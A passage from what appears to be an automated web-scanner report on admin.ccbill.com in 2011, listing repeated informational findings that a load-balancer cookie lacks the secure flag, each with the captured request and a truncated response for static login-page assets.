Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680fb3-6ad-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1709
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

7.36. https://admin.ccbill.com/js/AC_RunActiveContent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/AC_RunActiveContent.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:43 GMT
ETag: "1690841-22de-4933d81929cc0"
Accept-Ranges: bytes
Content-Length: 8926
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

//v1.7
// Flash Player Version Detection
// Detect Client Browser type
// Copyright 2005-2007 Adobe Systems Incorporated. All rights reserved.
var isIE = (navigator.appVersion.indexOf("MSIE") != -1)
...[SNIP]...

7.37. https://admin.ccbill.com/js/liveChat.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /js/liveChat.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/liveChat.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 09 Apr 2011 00:20:36 GMT
ETag: "d92d0-26a-4a0714fb73d00"
Accept-Ranges: bytes
Content-Length: 618
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

(function() {
var lc_params = '';
var lc_lang = 'en';
var lc_skill = '0';

var lc = document.createElement('script'); lc.type = 'text/javascript'; lc.async = true;
var lc_src = ('
...[SNIP]...

7.38. https://admin.ccbill.com/js/loginJSTools.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /js/loginJSTools.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/loginJSTools.js?17 HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:46 GMT
ETag: "169041c-c9a-4933d81c06380"
Accept-Ranges: bytes
Content-Length: 3226
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
// File: loginJSTools.js - collection of utility functions for newSkin login page
// Author: Michael S.
// Date: 2/20/2009
*/

// hook function to call functions on page load
function initPage() {
...[SNIP]...

7.39. https://admin.ccbill.com/login.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /login.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.cgi HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 302 Found
Date: Tue, 12 Jul 2011 17:14:53 GMT
Location: loginMM.cgi
Content-Length: 195
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="loginMM.cgi">here</a>.</p>
</body></html>

7.40. https://admin.ccbill.com/loginIndex.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /loginIndex.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loginIndex.cgi HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:01 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 6480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

7.41. https://admin.ccbill.com/loginMM.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /loginMM.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loginMM.cgi HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:54 GMT
Set-Cookie: JSession=; domain=ccbill.com; path=/; expires=Mon, 11-Jul-2011 17:14:56 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 18889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel=
...[SNIP]...

7.42. https://admin.ccbill.com/style/css/ccbill_style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/css/ccbill_style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/ccbill_style.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:05:00 GMT
ETag: "421253-677-4933d82960300"
Accept-Ranges: bytes
Content-Length: 1655
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*Header Styles*/
a.links {
color: black !important;
text-decoration: none !important;
font-family: Verdana !important;
font-size: 10px !important;
}

a.links:hover {
text-decorati
...[SNIP]...

7.43. https://admin.ccbill.com/style/css/default_style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/css/default_style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/default_style.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Fri, 05 Mar 2010 22:45:42 GMT
ETag: "4208d8-3347-4811579a51180"
Accept-Ranges: bytes
Content-Length: 13127
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/* CSS Document */

html {
overflow: auto;
}

body { font-family: Verdana; font-size: 11px; line-height: normal;}
a {font-size: 11px; font-family: Verdana, Arial, Helvetica, sans-serif; co
...[SNIP]...

7.44. https://admin.ccbill.com/style/css/images/text-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/css/images/text-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/images/text-bg.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 17:15:16 GMT
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 6288

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title></title>


<link rel="stylesheet" href="/style/css/default_style.css" type="text/css" />
<link rel="stylesheet" href="/sty
...[SNIP]...

7.45. https://admin.ccbill.com/style/css/password.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/css/password.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/password.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Thu, 20 Aug 2009 00:01:36 GMT
ETag: "58035b-1050-4718774815800"
Accept-Ranges: bytes
Content-Length: 4176
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

body { font-family: Verdana; font-size: 11px; }
a {font-size: 11px; font-family: Verdana, Arial, Helvetica, sans-serif; color: #1563A2; text-decoration: underline; }

.inputLostPass {
font-fa
...[SNIP]...

7.46. https://admin.ccbill.com/style/images/bg_img.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/bg_img.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/bg_img.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Mon, 20 Jul 2009 22:43:51 GMT
ETag: "580394-31d-46f2adf35d7c0"
Accept-Ranges: bytes
Content-Length: 797
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ......F...................................
...[SNIP]...

7.47. https://admin.ccbill.com/style/images/ccbillLogo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/ccbillLogo.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/ccbillLogo.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Sat, 23 Oct 2010 00:05:04 GMT
ETag: "1679555-171c-4933d82d30c00"
Accept-Ranges: bytes
Content-Length: 5916
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....H.H.....C...........
...
.    ..    ........................""""""""""...C.............. ! !!! !!!!!!!!"""""""""""""""......F...................................
...[SNIP]...

7.48. https://admin.ccbill.com/style/images/contactCCBillBtn.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/contactCCBillBtn.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/contactCCBillBtn.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 29 Jul 2009 00:07:17 GMT
ETag: "1679087-913-46fccf8525740"
Accept-Ranges: bytes
Content-Length: 2323
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR..............M......sBIT.....O....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmln
...[SNIP]...

7.49. https://admin.ccbill.com/style/images/email_icon.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/email_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/email_icon.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:10 GMT
Last-Modified: Mon, 24 Aug 2009 20:31:51 GMT
ETag: "137b6e-2f2-471e91b965bc0"
Accept-Ranges: bytes
Content-Length: 754
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR................a....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDAT8....k.a.......n....F..(FP...F.FT...ll....    .6*.Z.NP.5.">Q...]..1....d.1....H.......Q...p.......;}.......
...[SNIP]...

7.50. https://admin.ccbill.com/style/images/exclamation_icon.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/exclamation_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/exclamation_icon.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Tue, 28 Jul 2009 22:35:58 GMT
ETag: "40502-320-46fcbb1bf6f80"
Accept-Ranges: bytes
Content-Length: 800
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR................a....sBIT....|.d....    pHYs............X....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.01/22/09.......|IDAT8...KlLa....w.3=g.m..v:.R.m'..i.......VM,...+Q.H..
...[SNIP]...

7.51. https://admin.ccbill.com/style/images/s.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/s.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/s.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Mon, 12 Jan 2009 22:39:35 GMT
